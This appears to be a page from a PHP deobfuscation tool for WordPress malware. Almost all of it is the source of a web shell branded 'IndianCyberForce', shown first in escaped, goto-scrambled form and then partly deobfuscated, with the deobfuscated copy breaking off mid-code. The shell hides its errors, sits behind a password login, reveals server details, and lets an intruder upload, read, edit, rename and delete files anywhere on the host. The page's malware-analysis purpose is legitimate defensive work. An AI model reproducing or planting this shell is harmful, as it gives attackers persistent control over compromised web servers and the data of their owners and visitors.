Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php
session_start();
@set_time_limit(0);
@clearstatcache();
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
$password = "e880ef47f5221dfabe3248c324798371"; //asu
$default_action = "FilesMan";
$default_use_ajax = true;
$default_charset = 'UTF-8';
function login_shell()
{
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
body {
font-family: monospace;
}
input[type="password"] {
border: none;
border-bottom: 1px solid black;
padding: 2px;
}
input[type="password"]:focus {
outline: none;
}
input[type="submit"] {
border: none;
padding: 4.5px 20px;
background-color: #2e313d;
color: #FFF;
}
</style>
</head>
<body>
<form action="" method="post">
<div align="center">
<input type="password" name="pass" placeholder=" Password"> <input type="submit" name="submit" value=">">
</div>
</form>
</body>
</html>
<?php
exit;
}
if (!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) {
if (isset($_POST['pass']) && (md5($_POST['pass']) == $password)) {
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
} else {
login_shell();
}
}
goto wXdfz; gKdCH: if (isset($_GET["\146\151\154\145\163\162\143"])) { echo "\x3c\x74\x72\x3e\74\164\144\x3e\x3c\143\145\x6e\164\145\162\x3e\103\165\162\x72\x65\x6e\x74\40\x46\151\154\x65\x20\x3a\40"; echo $_GET["\x66\151\154\x65\163\x72\x63"]; echo "\x3c\x2f\143\145\x6e\164\x65\162\x3e\74\x2f\164\x72\76\x3c\x2f\x74\x64\76\74\x2f\x74\141\142\x6c\145\76\x3c\x62\162\x20\x2f\x3e"; echo "\x20\x3c\164\x65\x78\x74\x61\x72\x65\x61\x20\163\164\x79\x6c\x65\75\42\x77\151\144\164\150\72\x20\61\x30\60\45\73\150\145\x69\147\x68\x74\72\40\x34\x30\x30\160\170\73\x22\40\162\145\x61\144\x6f\x6e\x6c\171\76\40" . htmlspecialchars(file_get_contents($_GET["\x66\x69\x6c\145\163\x72\143"])) . "\x3c\x2f\164\x65\x78\x74\x61\162\145\x61\x3e"; } elseif (isset($_GET["\157\x70\164\151\x6f\156"]) && $_GET["\157\x70\164"] != "\144\x65\154\x65\x74\145") { echo "\74\x2f\x74\x61\x62\x6c\x65\x3e\74\x62\x72\x20\x2f\x3e\74\143\x65\x6e\164\145\x72\76" . $_POST["\155\x61\x61\x72\x67"] . "\x3c\x62\162\x20\x2f\76\x3c\142\x72\x20\x2f\76"; if ($_GET["\x6f\160\x74"] == "\143\x68\x6d\157\144") { if (isset($_POST["\x70\145\x72\155"])) { } $hell = $_GET["\x6d\141\x61\162\147"]; $kiya = $_GET["\156\x61\155\x65"]; $patc = "{$hell}\57{$kiya}"; } elseif ($_GET["\x6f\160\x74"] == "\162\145\156\141\x6d\145") { if (isset($_POST["\156\145\x77\156\x61\x6d\145"])) { if (rename($_POST["\x6d\141\141\162\x67"], $maarg . "\57" . $_POST["\x6e\145\167\156\141\x6d\x65"])) { echo "\x3c\146\x6f\x6e\x74\x20\143\157\154\x6f\x72\75\x22\147\x72\145\145\156\x22\76\x4e\x61\155\x65\40\x43\150\x61\x6e\147\x65\x64\x21\x3c\x2f\146\x6f\156\164\76\x3c\x62\x72\40\x2f\x3e"; } else { echo "\x3c\146\157\x6e\164\x20\x63\x6f\x6c\x6f\162\75\42\x72\x65\x64\42\x3e\105\162\162\x6f\x72\x20\x46\x6f\x75\x6e\x64\x21\x3c\x2f\146\157\x6e\x74\76\x3c\x62\162\x20\57\x3e"; } $_POST["\x6e\141\x6d\x65"] = $_POST["\156\145\167\x6e\141\155\x65"]; } $hell = $_GET["\155\x61\141\162\x67"]; $kiya = $_GET["\156\141\155\145"]; $patc = "{$hell}\x2f{$kiya}"; $new = $_POST["\x6e\x65\167\156\141\x6d\x65"]; echo "\74\146\157\162\155\x20\x6d\145\164\150\x6f\144\75\x22\120\x4f\123\x54\42\76\xa\116\145\x77\40\x4e\x61\x6d\x65\x20\72\40\x3c\151\156\160\165\164\x20\x6e\141\x6d\145\75\42\156\145\167\156\141\x6d\145\x22\x20\x74\x79\160\145\x3d\42\x74\145\170\164\42\40\x73\x69\x7a\145\x3d\x22\62\60\x22\x20\166\141\154\x75\x65\x3d\x22" . $new . "\42\40\57\x3e\xa\74\x69\x6e\160\x75\x74\x20\164\x79\x70\145\x3d\x22\x68\x69\144\144\145\x6e\42\40\x6e\x61\155\x65\75\42\x6d\141\141\162\x67\x22\40\166\x61\x6c\165\145\75\x22" . $patc . "\42\x3e\xa\x3c\x69\156\160\165\164\40\x74\x79\160\x65\75\42\x68\x69\x64\x64\145\156\42\40\x6e\x61\x6d\145\75\42\x6f\x70\164\x22\40\x76\x61\154\165\x65\75\x22\x72\145\156\141\155\145\42\x3e\12\74\151\156\x70\165\x74\40\x74\171\x70\145\x3d\x22\163\x75\142\x6d\151\x74\42\x20\166\x61\154\165\x65\75\42\x53\x61\x76\145\x22\40\57\x3e\12\x3c\57\146\x6f\162\x6d\x3e"; } elseif ($_GET["\x6f\160\x74"] == "\x65\144\151\164") { if (isset($_POST["\x73\x72\143"])) { $fp = fopen($_POST["\155\x61\141\162\x67"], "\x77"); if (fwrite($fp, $_POST["\163\162\143"])) { echo "\74\x66\157\156\x74\40\x63\x6f\x6c\157\x72\75\x22\147\162\145\145\156\x22\76\106\x69\x6c\x65\40\105\144\x69\164\x65\x64\x21\74\x2f\146\157\x6e\164\x3e\x3c\x62\162\40\57\76"; } else { echo "\74\x66\157\x6e\x74\x20\143\x6f\154\157\x72\75\42\x72\145\144\42\x3e\x45\144\x69\164\40\x45\x72\162\157\x72\x21\x20\74\57\x66\157\x6e\x74\76\x3c\x62\162\40\57\x3e"; } fclose($fp); } $hell = $_GET["\x6d\141\x61\x72\x67"]; $kiya = $_GET["\156\x61\x6d\145"]; $patc = "{$hell}\57{$kiya}"; echo "\74\146\x6f\162\x6d\x20\x6d\145\164\x68\x6f\144\x3d\x22\120\x4f\x53\x54\42\x3e\12\x3c\164\x65\x78\164\141\x72\x65\141\x20\143\x6f\x6c\163\75\x38\x30\40\162\x6f\x77\x73\75\62\x30\x20\x6e\141\x6d\145\x3d\42\x73\162\143\x22\x3e" . htmlspecialchars(file_get_contents($patc)) . "\74\57\x74\x65\170\x74\141\162\145\141\76\74\142\x72\x20\57\x3e\12\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x22\150\151\x64\144\145\x6e\42\x20\x6e\141\155\145\75\x22\155\141\141\x72\x67\42\x20\x76\x61\x6c\x75\145\x3d\x22" . $patc . "\42\x3e\xa\74\x69\x6e\x70\165\x74\40\164\x79\x70\145\75\42\x68\151\144\144\x65\x6e\x22\x20\x6e\x61\155\x65\x3d\x22\157\160\164\x22\40\166\141\154\x75\145\x3d\x22\145\x64\151\164\42\76\12\x3c\x69\156\x70\x75\x74\40\164\x79\x70\145\x3d\x22\163\165\142\x6d\151\164\x22\x20\x76\x61\x6c\165\x65\x3d\42\123\141\x76\145\42\x20\57\x3e\12\x3c\x2f\x66\x6f\162\155\x3e"; } echo "\x3c\57\x63\145\156\164\145\x72\x3e"; } else { echo "\x3c\x2f\164\x61\142\154\145\76\x3c\142\x72\x20\57\x3e\74\143\x65\156\x74\145\x72\x3e"; if (isset($_GET["\157\160\164\x69\157\156"]) && $_GET["\x6f\160\164"] == "\x64\145\x6c\x65\164\145") { $hell = $_GET["\155\141\141\162\x67"]; $kiya = $_GET["\x6e\x61\x6d\x65"]; $patc = "{$hell}\57{$kiya}"; if ($_GET["\164\171\x70\x65"] == "\x64\x69\x72") { if (rmdir($patc)) { echo "\x3c\x66\157\156\x74\x20\x63\157\154\157\162\75\42\x67\162\145\x65\156\x22\x3e\x44\151\162\x20\x44\x65\x6c\164\x65\x64\41\x3c\57\x66\157\x6e\x74\76\74\x62\x72\x20\x2f\76"; } else { echo "\74\146\x6f\x6e\x74\40\x63\157\154\x6f\x72\x3d\x22\162\x65\x64\x23\x22\76\x44\145\x6c\145\x74\x65\x20\x45\x72\x72\157\162\x21\40\x3c\57\146\157\156\164\x3e\x3c\x62\162\40\x2f\x3e"; } } elseif ($_GET["\164\171\160\x65"] == "\x66\x69\154\x65") { $hell = $_GET["\x6d\x61\x61\x72\x67"]; $kiya = $_GET["\x6e\x61\155\x65"]; $patc = "{$hell}\57{$kiya}"; if (unlink($patc)) { echo "\x3c\x66\x6f\156\164\40\x63\x6f\x6c\157\162\75\x22\162\145\144\43\x22\76\x46\151\x6c\x65\40\x44\145\154\145\164\x65\144\x21\x20\x3c\57\x66\x6f\156\x74\76\x3c\x62\162\x20\57\76"; } else { echo "\74\146\x6f\156\x74\x20\143\x6f\154\157\162\x3d\42\162\x65\x64\x23\42\x3e\x44\x65\x6c\x65\164\x65\x20\x46\151\154\145\x20\x45\x72\162\157\x72\x20\74\x2f\x66\157\156\164\76\x3c\142\162\x20\57\76"; } } } echo "\x3c\57\143\x65\156\x74\x65\162\x3e"; $scandir = scandir($maarg); $pa = getcwd(); echo "\x20\74\164\141\142\154\145\40\x77\151\x64\164\150\75\42\x39\65\x25\x22\x20\x63\154\x61\163\x73\x3d\42\164\x61\x62\x6c\x65\137\x68\x6f\155\145\42\40\142\157\x72\x64\x65\x72\x3d\x22\x30\x22\x20\143\145\x6c\154\160\x61\144\144\151\x6e\x67\75\42\63\42\x20\143\145\154\154\x73\x70\x61\143\151\x6e\147\x3d\42\61\x22\40\141\154\151\x67\x6e\75\x22\143\x65\x6e\164\x65\x72\x22\x20\163\164\x79\x6c\145\x3d\x22\143\157\x6c\157\x72\72\143\171\141\156\73\42\76\12\x3c\164\x72\x3e\12\x3c\x74\x68\40\143\x6c\x61\x73\x73\x3d\164\150\137\150\x6f\155\x65\40\163\x74\x79\154\145\x3d\42\x62\x61\143\x6b\x67\162\x6f\165\156\x64\x3a\147\162\x65\x65\156\x3b\143\157\154\157\162\72\x20\127\x68\x69\164\145\73\40\164\x65\170\164\55\163\x68\x61\144\157\x77\72\40\60\160\x78\x20\x33\x70\170\x20\61\x32\160\x78\40\x72\x65\144\x3b\x22\76\x3c\x63\x65\x6e\164\x65\x72\x3e\x3c\x62\x3e\116\x61\x6d\145\x3c\57\142\76\74\x2f\x63\x65\x6e\x74\145\x72\76\x3c\x2f\x74\x68\76\xa\x3c\x74\150\x20\x63\154\x61\x73\x73\x3d\x74\x68\x5f\150\157\155\145\40\x73\x74\x79\154\145\75\42\x62\x61\x63\153\147\x72\x6f\165\x6e\144\x3a\x67\162\x65\145\156\x3b\143\x6f\x6c\x6f\x72\x3a\x20\x57\150\x69\x74\145\x3b\40\164\145\170\164\55\163\150\x61\x64\157\167\72\x20\60\160\x78\40\63\160\170\40\61\x32\160\x78\40\162\x65\x64\73\x22\x20\76\x3c\x63\145\156\x74\145\162\x3e\74\x62\76\x53\151\x7a\145\x3c\x2f\142\76\74\x2f\143\x65\x6e\x74\x65\162\x3e\x3c\x2f\164\x68\x3e\12\74\x74\x68\40\x63\x6c\141\163\x73\x3d\x74\x68\x5f\x68\157\x6d\145\x20\163\x74\171\154\145\75\x22\x62\x61\143\153\147\x72\x6f\165\156\x64\x3a\x67\162\145\x65\156\73\143\157\x6c\157\x72\x3a\x20\x57\x68\x69\164\x65\x3b\x20\164\145\170\164\x2d\x73\150\141\144\x6f\167\x3a\40\60\160\170\x20\63\x70\170\40\x31\x32\160\x78\40\162\x65\x64\x3b\42\40\76\x3c\143\x65\x6e\164\x65\x72\x3e\x3c\x62\x3e\x50\x65\162\155\x69\x73\x69\x6f\156\74\x2f\x62\x3e\x3c\57\x63\x65\x6e\x74\145\x72\x3e\74\57\x74\150\x3e\xa\x3c\x74\150\40\x63\x6c\141\x73\x73\x3d\x74\150\137\150\x6f\x6d\x65\x20\163\164\171\x6c\145\75\42\x62\x61\143\x6b\x67\162\x6f\165\x6e\x64\72\x67\x72\x65\145\156\73\x63\x6f\154\157\162\72\40\x57\150\x69\164\145\73\40\x74\145\x78\164\55\163\x68\141\x64\x6f\x77\x3a\x20\60\x70\170\x20\63\x70\x78\x20\x31\62\160\170\x20\x72\x65\x64\x3b\x22\x20\76\74\143\145\156\164\145\162\x3e\x3c\x62\76\x4f\x70\x74\151\157\156\x73\x3c\57\142\x3e\74\x2f\x63\x65\156\x74\x65\x72\76\x3c\57\164\x68\x3e\xa\x3c\x2f\164\x72\x3e\x20\x3c\164\162\76\12"; foreach ($scandir as $dir) { if (!is_dir("{$maarg}\57{$dir}") || $dir == "\56" || $dir == "\x2e\56") { continue; } echo "\xa\74\x74\162\76\12\x3c\164\144\x20\143\x6c\141\x73\x73\x3d\164\x64\x5f\150\x6f\155\145\76\x3c\x61\40\150\x72\x65\x66\75\x22\x3f\x6d\x61\x61\162\147\75{$maarg}\x2f{$dir}\42\76{$dir}\74\x2f\x61\x3e\74\57\164\x64\x3e\xa\74\164\144\40\143\154\x61\163\163\75\x74\144\x5f\150\157\x6d\145\40\76\x3c\x63\x65\156\164\x65\x72\76\104\151\162\x3c\x2f\x63\145\x6e\164\145\162\76\x3c\57\164\x64\76\xa\x3c\x74\144\40\x63\x6c\141\x73\163\75\164\144\137\150\x6f\x6d\x65\40\76\74\143\145\x6e\164\145\162\x3e"; if (is_writable("{$maarg}\x2f{$dir}")) { echo "\74\x66\x6f\156\x74\40\143\x6f\x6c\157\x72\x3d\x22\147\x72\145\x65\x6e\42\x3e"; } elseif (!is_readable("{$maarg}\x2f{$dir}")) { echo "\x3c\x66\157\x6e\x74\40\x63\157\154\157\162\x3d\x22\x72\145\x64\x22\x3e"; } echo perms("{$maarg}\x2f{$dir}"); if (is_writable("{$maarg}\57{$dir}") || !is_readable("{$maarg}\x2f{$dir}")) { echo "\74\57\146\x6f\156\164\x3e"; } echo "\74\57\143\145\156\x74\x65\x72\x3e\x3c\x2f\x74\x64\x3e\xa\x3c\164\144\x20\x63\154\x61\x73\x73\x3d\x74\144\137\150\157\x6d\x65\40\76\x3c\143\x65\156\x74\145\162\76\74\x61\40\x68\162\x65\146\75\42\x3f\157\x70\164\x69\x6f\x6e\x26\155\x61\141\x72\147\75{$maarg}\x26\157\160\164\x3d\x72\145\156\x61\x6d\145\x26\x74\171\x70\x65\75\x64\151\x72\46\x6e\141\x6d\x65\75{$dir}\42\x3e\40\x20\40\40\122\145\156\x61\x6d\145\74\x2f\x61\76\40\x3c\141\x20\x68\162\x65\146\75\42\x3f\157\160\164\151\157\156\46\x6d\141\x61\x72\147\75{$maarg}\x26\157\160\164\75\x64\x65\154\145\164\x65\x26\x74\x79\160\145\x3d\144\151\x72\46\x6e\141\155\x65\75{$dir}\42\x3e\40\40\40\40\x44\x65\x6c\x65\x74\145\x3c\x2f\x61\76\12\74\57\143\145\156\164\x65\x72\x3e\74\x2f\x74\x64\x3e\12\74\x2f\164\x72\76"; } echo "\x3c\x62\x72\x3e"; foreach ($scandir as $ICF) { if (!is_file("{$maarg}\x2f{$ICF}")) { continue; } $size = filesize("{$maarg}\57{$ICF}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . "\40\x4d\x42"; } else { $size = $size . "\40\x4b\102"; } echo "\74\x74\x72\x3e\xa\74\x74\144\40\x63\x6c\x61\163\163\x3d\164\144\x5f\150\x6f\155\145\40\x3e\74\141\x20\x68\x72\145\146\x3d\42\77\x66\151\x6c\x65\163\x72\x63\x3d{$maarg}\x2f{$ICF}\46\155\x61\141\x72\x67\x3d{$maarg}\42\76{$ICF}\x3c\x2f\x61\76\x3c\x2f\164\144\x3e\xa\x3c\164\144\40\143\x6c\x61\x73\x73\75\164\x64\x5f\x68\157\155\x65\x3e\x3c\x63\x65\156\x74\x65\x72\76" . $size . "\74\x2f\x63\145\x6e\164\x65\x72\76\x3c\57\x74\144\76\xa\x3c\x74\x64\x20\143\154\x61\x73\163\75\164\x64\x5f\150\157\155\x65\76\74\143\x65\x6e\164\145\162\76"; if (is_writable("{$maarg}\57{$ICF}")) { echo "\x3c\146\x6f\156\x74\x20\143\157\x6c\157\x72\75\42\147\x72\145\145\156\42\76"; } elseif (!is_readable("{$maarg}\57{$ICF}")) { echo "\74\146\x6f\156\164\x20\143\x6f\154\157\162\x3d\42\x72\x65\x64\x22\x3e"; } echo perms("{$maarg}\57{$ICF}"); if (is_writable("{$maarg}\x2f{$ICF}") || !is_readable("{$maarg}\57{$ICF}")) { echo "\74\x2f\146\x6f\156\164\76"; } echo "\x3c\x2f\143\x65\156\x74\x65\x72\76\74\57\164\144\x3e\xa\x3c\164\144\40\143\154\x61\x73\x73\75\164\144\137\150\157\x6d\145\76\x3c\x63\x65\156\164\x65\162\76\xa\74\x61\x20\x68\x72\145\146\x3d\42\77\x6f\x70\x74\151\x6f\x6e\46\x6d\141\141\162\147\75{$maarg}\46\x6f\160\x74\75\145\x64\x69\164\46\x74\x79\x70\145\75\x66\151\x6c\x65\x26\x6e\x61\x6d\x65\x3d{$ICF}\42\x3e\x45\x64\x69\164\x3c\x2f\x61\x3e\x20\x3c\x61\40\x68\x72\145\x66\x3d\x22\77\x6f\x70\164\151\157\x6e\46\155\141\x61\162\x67\x3d{$maarg}\x26\157\160\164\75\162\145\156\x61\x6d\x65\46\x74\x79\160\145\75\146\151\154\x65\46\156\141\155\x65\x3d{$ICF}\x26\x6d\141\141\162\147\x3d{$maarg}\42\x3e\x20\x20\40\40\122\x65\x6e\x61\x6d\145\74\57\x61\76\40\74\x61\x20\x68\x72\x65\146\x3d\x22\x3f\157\160\x74\x69\x6f\156\x26\155\x61\141\x72\147\x3d{$maarg}\46\157\160\x74\x3d\144\x65\x6c\x65\164\145\46\x74\x79\x70\145\75\146\151\x6c\x65\46\156\141\x6d\x65\75{$ICF}\x22\x3e\x20\40\40\x20\x44\x65\x6c\145\x74\145\74\57\141\x3e\xa\x3c\57\x63\x65\x6e\x74\145\162\x3e\x3c\x2f\164\x64\76\12\74\57\164\x72\76"; } echo "\74\x2f\164\141\142\154\x65\x3e\xa\x3c\57\x64\x69\166\x3e"; } goto yhRvK; Tt7wS: function perms($ICF) { $anumati = fileperms($ICF); if (($anumati & 49152) == 49152) { $tathya = "\163"; } elseif (($anumati & 40960) == 40960) { $tathya = "\154"; } elseif (($anumati & 32768) == 32768) { $tathya = "\x2d"; } elseif (($anumati & 24576) == 24576) { $tathya = "\x62"; } elseif (($anumati & 16384) == 16384) { $tathya = "\144"; } elseif (($anumati & 8192) == 8192) { $tathya = "\143"; } elseif (($anumati & 4096) == 4096) { $tathya = "\x70"; } else { $tathya = "\x75"; } $tathya .= $anumati & 256 ? "\162" : "\55"; $tathya .= $anumati & 128 ? "\x77" : "\55"; $tathya .= $anumati & 64 ? $anumati & 2048 ? "\x73" : "\x78" : ($anumati & 2048 ? "\x53" : "\x2d"); $tathya .= $anumati & 32 ? "\x72" : "\x2d"; $tathya .= $anumati & 16 ? "\167" : "\x2d"; $tathya .= $anumati & 8 ? $anumati & 1024 ? "\x73" : "\x78" : ($anumati & 1024 ? "\123" : "\x2d"); $tathya .= $anumati & 4 ? "\x72" : "\55"; $tathya .= $anumati & 2 ? "\x77" : "\x2d"; $tathya .= $anumati & 1 ? $anumati & 512 ? "\164" : "\x78" : ($anumati & 512 ? "\x54" : "\x2d"); return $tathya; } goto XRTtt; xnOBY: $namha = explode("\x2f", $maarg); goto txT74; XOX5F: echo "{$_SERVER["\x53\105\122\126\105\x52\x5f\x41\104\x44\122"]}"; goto cutJ7; wXdfz: ?>
<!doctypehtml><html lang="en"><head><meta content="IndianCyberForce"name="author"><title>CyberForceX</title><style>body{background:#000;line-height:1;color:#fff;font-family:Serif}table,td,th{border-collapse:collapse;background:0 0;font-family:Serif;font-size:15px}input,textarea{font-family:Serif}.table_home,.td_home,.th_home{color:#fff;border:5px #0ff}th{padding:10px}.td_home{padding:7px}select{font-family:Serif}a{color:#ff0}textarea{width:100%;height:400px}</style><center><h1><font style="color:#fff;text-shadow:1px 3px 12px #0ff">IndianCyberForce</font></h1></center><li><font color="cyan">Software: </font><font color="white"style="font-family:Cursive"><?php goto w0X3u; RgzyC: echo "\x3c\x66\157\x72\x6d\x20\x65\156\x63\164\x79\x70\145\x3d\42\x6d\165\x6c\x74\x69\x70\141\x72\164\57\146\157\162\155\55\144\141\164\141\x22\x20\155\x65\164\150\157\144\x3d\x22\x50\x4f\123\x54\42\76\x3c\x66\157\156\x74\x20\x63\157\x6c\x6f\162\x3d\42\142\x6c\x61\x63\153\x22\x3e\x3c\151\x6e\160\165\x74\40\x73\164\x79\x6c\x65\x3d\x22\142\141\x63\153\147\x72\157\165\156\x64\x3a\147\162\145\x79\73\146\x6f\156\x74\x2d\x66\141\155\151\154\x79\72\40\x63\165\162\x73\151\x76\145\x22\40\x74\171\x70\145\x3d\x22\x66\x69\154\x65\x22\40\x6e\141\x6d\145\75\42\146\x69\x6c\145\42\40\x2f\76\xa\74\151\x6e\x70\x75\164\40\x73\164\171\x6c\145\75\42\146\x6f\x6e\x74\55\x66\x61\155\151\154\171\x3a\x20\143\x75\x72\x73\x69\x76\145\x22\x20\164\171\x70\145\x3d\x22\x73\165\x62\x6d\151\164\42\40\x76\x61\154\165\x65\75\42\x55\160\154\157\x61\x64\x22\x20\x2f\x3e\xa\74\57\x66\x6f\162\155\76\12\x3c\57\x74\144\76\74\x2f\164\x72\x3e"; goto gKdCH; IN4_o: if (isset($_GET["\x6d\141\x61\162\x67"])) { $maarg = $_GET["\x6d\x61\x61\162\x67"]; } else { $maarg = getcwd(); } goto Iu1vT; w0X3u: echo "{$_SERVER["\x53\105\x52\x56\x45\122\x5f\123\x4f\106\x54\x57\101\122\105"]}"; goto TgYMA; F1t3v: echo "{$_SERVER["\x53\x45\122\x56\x45\x52\x5f\101\104\x4d\x49\116"]}"; goto wvJrV; txT74: foreach ($namha as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "\74\x66\157\x6e\x74\x20\x63\x6f\x6c\157\x72\75\42\143\171\141\156\42\76\103\167\x64\72\40\x3c\x2f\x66\157\x6e\x74\76\x3c\146\157\156\164\x20\x63\157\x6c\157\x72\75\42\x77\150\x69\164\x65\42\76\74\141\x20\x68\x72\145\146\x3d\42\77\x6d\x61\x61\162\147\75\57\42\x3e\x2f\74\x2f\141\x3e\74\57\146\x6f\156\164\76"; continue; } if ($pat == '') { continue; } echo "\x3c\x61\40\x68\162\145\x66\75\42\x3f\x6d\141\x61\162\147\x3d"; for ($i = 0; $i <= $id; $i++) { echo "{$namha[$i]}"; if ($i != $id) { echo "\57"; } } echo "\x22\x3e" . $pat . "\x3c\57\141\x3e\x2f"; } goto j0i7q; FfeBS: echo "\74\x62\162\76"; goto ISDSc; wvJrV: ?>
</font></li><?php goto g4CQJ; g4CQJ: echo "\74\x2f\150\145\141\144\x3e\12\74\x62\157\x64\x79\x3e\12\x3c\164\162\76\x3c\164\144\76\12\x3c\x66\157\156\x74\40\x63\157\154\157\x72\x3d\x22\x63\x79\x61\x6e\42\x3e\125\156\x61\155\x65\72\40\74\57\x66\157\x6e\164\x3e\x3c\146\x6f\x6e\164\x20\x63\157\x6c\x6f\162\75\x22\167\150\x69\x74\145\x22\x20\x73\164\171\x6c\145\75\42\x66\157\x6e\164\55\146\141\x6d\151\154\x79\x3a\40\x43\x75\x72\163\x69\x76\x65\73\x22\x3e" . php_uname() . "\x3c\x2f\143\x65\156\x74\145\162\x3e\74\x2f\146\x6f\x6e\164\x3e\x3c\142\x72\x3e"; goto IN4_o; ISDSc: if (isset($_FILES["\146\x69\x6c\145"])) { if (copy($_FILES["\x66\x69\154\145"]["\x74\x6d\x70\137\x6e\141\x6d\145"], $maarg . "\57" . $_FILES["\x66\x69\154\x65"]["\156\x61\155\x65"])) { echo "\74\x73\143\162\151\x70\x74\x3e\167\x69\156\x64\x6f\167\56\x6c\157\143\x61\x74\x69\157\x6e\x3d\47\77\155\141\x61\x72\147\x3d" . $maarg . "\47\x3b\x20\x61\154\145\162\x74\50\x27\x46\x69\154\145\x20\125\x70\154\157\x61\x64\145\x64\x21\47\x29\74\57\163\x63\x72\151\160\164\76"; } else { echo "\74\x73\143\162\x69\x70\164\76\167\151\156\x64\x6f\x77\x2e\x6c\x6f\143\x61\x74\151\157\x6e\x3d\x27\x3f\x6d\x61\x61\162\x67\x3d" . $maarg . "\x27\73\x20\x61\x6c\x65\x72\x74\x28\x27\125\x70\x6c\157\141\x64\40\106\151\x65\154\144\41\47\51\74\x2f\163\x63\x72\x69\x70\x74\76"; } } goto RgzyC; TgYMA: ?>
</font></li><li><font color="cyan">Server IP: </font><font color="white"style="font-family:Cursive"><?php goto XOX5F; Iu1vT: $maarg = str_replace("\x5c", "\57", $maarg); goto xnOBY; cutJ7: ?>
</font></li><li><font color="cyan">Server Admin: </font><font color="white"style="font-family:Cursive"><?php goto F1t3v; j0i7q: echo "\x3c\142\162\76\74\57\146\x6f\156\x74\x3e\x3c\57\143\x65\x6e\x74\x65\162\76\74\x2f\164\x64\x3e\x3c\x2f\164\162\76\x3c\164\162\76\x3c\x74\144\x3e"; goto FfeBS; yhRvK: echo "\74\143\145\x6e\x74\145\x72\x3e\74\x68\65\76\74\146\x6f\x6e\164\x20\x63\157\x6c\x6f\x72\x3d\42\42\x20\106\141\143\145\75\x22\111\x6e\x64\x69\145\x22\x73\x74\171\x6c\145\75\x22\x63\157\x6c\157\x72\x3a\x20\127\x68\151\x74\145\73\x20\164\145\170\x74\x2d\163\x68\x61\144\x6f\x77\72\40\x31\x70\x78\40\64\x70\170\40\x31\x32\160\x78\x20\x72\145\144\73\42\x3e\103\171\x62\145\162\x46\157\x72\143\145\x58\x40\x32\x30\62\64\74\57\x66\x6f\156\164\x3e\x3c\x2f\x68\x35\76\74\57\x62\x6f\x64\171\x3e\xa\x3c\57\x68\164\155\154\76"; goto Tt7wS; XRTtt: ?><?php
session_start();
@set_time_limit(0);
@clearstatcache();
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
$password = "e880ef47f5221dfabe3248c324798371";
//asu
$default_action = "FilesMan";
$default_use_ajax = true;
$default_charset = 'UTF-8';
function login_shell()
{
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
body {
font-family: monospace;
}
input[type="password"] {
border: none;
border-bottom: 1px solid black;
padding: 2px;
}
input[type="password"]:focus {
outline: none;
}
input[type="submit"] {
border: none;
padding: 4.5px 20px;
background-color: #2e313d;
color: #FFF;
}
</style>
</head>
<body>
<form action="" method="post">
<div align="center">
<input type="password" name="pass" placeholder=" Password"> <input type="submit" name="submit" value=">">
</div>
</form>
</body>
</html>
<?php
exit;
}
if (!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) {
if (isset($_POST['pass']) && md5($_POST['pass']) == $password) {
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
} else {
login_shell();
}
}
?>
<!doctypehtml><html lang="en"><head><meta content="IndianCyberForce"name="author"><title>CyberForceX</title><style>body{background:#000;line-height:1;color:#fff;font-family:Serif}table,td,th{border-collapse:collapse;background:0 0;font-family:Serif;font-size:15px}input,textarea{font-family:Serif}.table_home,.td_home,.th_home{color:#fff;border:5px #0ff}th{padding:10px}.td_home{padding:7px}select{font-family:Serif}a{color:#ff0}textarea{width:100%;height:400px}</style><center><h1><font style="color:#fff;text-shadow:1px 3px 12px #0ff">IndianCyberForce</font></h1></center><li><font color="cyan">Software: </font><font color="white"style="font-family:Cursive"><?php
echo "{$_SERVER["SERVER_SOFTWARE"]}";
?>
</font></li><li><font color="cyan">Server IP: </font><font color="white"style="font-family:Cursive"><?php
echo "{$_SERVER["SERVER_ADDR"]}";
?>
</font></li><li><font color="cyan">Server Admin: </font><font color="white"style="font-family:Cursive"><?php
echo "{$_SERVER["SERVER_ADMIN"]}";
?>
</font></li><?php
echo "</head>\n<body>\n<tr><td>\n<font color=\"cyan\">Uname: </font><font color=\"white\" style=\"font-family: Cursive;\">" . php_uname() . "</center></font><br>";
if (isset($_GET["maarg"])) {
$maarg = $_GET["maarg"];
} else {
$maarg = getcwd();
}
$maarg = str_replace("\\", "/", $maarg);
$namha = explode("/", $maarg);
foreach ($namha as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo "<font color=\"cyan\">Cwd: </font><font color=\"white\"><a href=\"?maarg=/\">/</a></font>";
continue;
}
if ($pat == '') {
continue;
}
echo "<a href=\"?maarg=";
for ($i = 0; $i <= $id; $i++) {
echo "{$namha[$i]}";
if ($i != $id) {
echo "/";
}
}
echo "\">" . $pat . "</a>/";
}
echo "<br></font></center></td></tr><tr><td>";
echo "<br>";
if (isset($_FILES["file"])) {
if (copy($_FILES["file"]["tmp_name"], $maarg . "/" . $_FILES["file"]["name"])) {
echo "<script>window.location='?maarg=" . $maarg . "'; alert('File Uploaded!')</script>";
} else {
echo "<script>window.location='?maarg=" . $maarg . "'; alert('Upload Field!')</script>";
}
}
echo "<form enctype=\"multipart/form-data\" method=\"POST\"><font color=\"black\"><input style=\"background:grey;font-family: cursive\" type=\"file\" name=\"file\" />\n<input style=\"font-family: cursive\" type=\"submit\" value=\"Upload\" />\n</form>\n</td></tr>";
if (isset($_GET["filesrc"])) {
echo "<tr><td><center>Current File : ";
echo $_GET["filesrc"];
echo "</center></tr></td></table><br />";
